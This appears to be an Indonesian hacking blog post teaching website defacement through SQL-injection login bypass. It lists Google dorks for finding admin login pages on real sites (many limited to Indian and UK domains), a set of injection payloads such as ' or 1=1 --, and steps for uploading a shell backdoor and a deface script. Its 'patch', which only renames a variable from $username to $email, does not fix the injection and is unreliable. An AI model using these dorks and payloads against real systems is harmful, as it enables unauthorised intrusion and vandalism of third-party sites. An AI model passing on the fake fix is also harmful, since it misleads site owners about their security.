Bypass Sql Log Beserta Cara Patch Nya

(Berbeda dengan tutorial lainnya,kali ini akan memberikan tutor deface poc bypass sql beserta cara patch bug nya)




Kembali lagi dengan saya si ganteng mwehehe,kali ini saya akan memberikan tips and trik nih buat poc bypass sql login beserta cara patch nya juga,intinya ya setidaknya lu jangan tau ngerusaknya doank,tapi juga harus tau cara ngamanin atau benerinnya yakann..

Bahan-bahan

• Dork:
intext:start your session intitle:log in
"start your session" intitle:Admin site:in
inurl:/admin/login.php site:in
intext:"password" inurl:/admin site:in
inurl:/panel/indexphp
intitle:"administrator" site:in
inurl:/panel intext:"Parent Directory"
intitle:"login" inurl:/administrator site:uk
inurl:/panel intext:"Parent Directory" intitle:"/image site:in
intitle:"administrator" inurl:/login.php site:in
intext:"username" intitle:"login"
inurl:/admin/logout.php
inurl:/admin/images intext:"Parent Directory" site:in
site:uk intext:"admin/images" intitle:"index of"
intext:"banner" inurl:/admin
panel/login.php
inurl:/login site:in
intext:"logo" inurl:/panel
"index of" admin/upload
site:in /admin/upload

(Kembangin pan8 kalo mau panen)

• Exploit user/password nya:
' or 1=1 limit 1 -- -+
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

• Internet
• Shell backdoor
• Apk Browser
• Face yang cool😎 seperti mimin

Tutorial bypass sql

1. Dorking dengan dork yang sudah saya sediakan diatas atau yang sudah anda kembangkan.
2. Masukan user/password default di atas ke menu form login adminnya.Jika vuln maka anda akan masuk otomatis ke halaman dashboard admin.
[Contoh]


3. Cari tempat upload,biasanya tempat upload nya berada di bagian product,profil admin.



4. Jika sudah Upload Shell backdoor,anda tinggal akses shell nya (up script deface atau apalah serah bapak kau)
Dan tutor bypass nya Done.

Cara patch bug bypass sql login

caranya sungguh simple sekali kawan,yaitu dengan merubah variable nya saja,karena pada live target saya kali ini,dia input data form loginnya salah,harusnya jika username nya email makan variable nya email kan,nah dia variable nya malah username,jadi kita tinggal ubah aja deh dari $username jadi $email .

1.  Pertama anda cari file script login adminnya,kemudian anda edit file nya seperti gambar dibawah ini:



2. Ubah dari $username jadi $email



3. Lalu klik save,dan mari kita coba bug nya apakah masih bekerja?



Dan boom,input data username dan passwordnya salah,kita tidak bisa membypassnya lagi,dan orang lain tydac bisa menikung hehe.

Penutup

Dan untuk penutup konten kali ini mimin cuman mau bilang: "PEGEL Anjim Jari aink"

Sekian dan mohon maaf bila ada kesalahan,dan terimakasih telah berkunjung,wassalamualaikum..


Tidak ada komentar untuk "Bypass Sql Log Beserta Cara Patch Nya"

Berlangganan via Email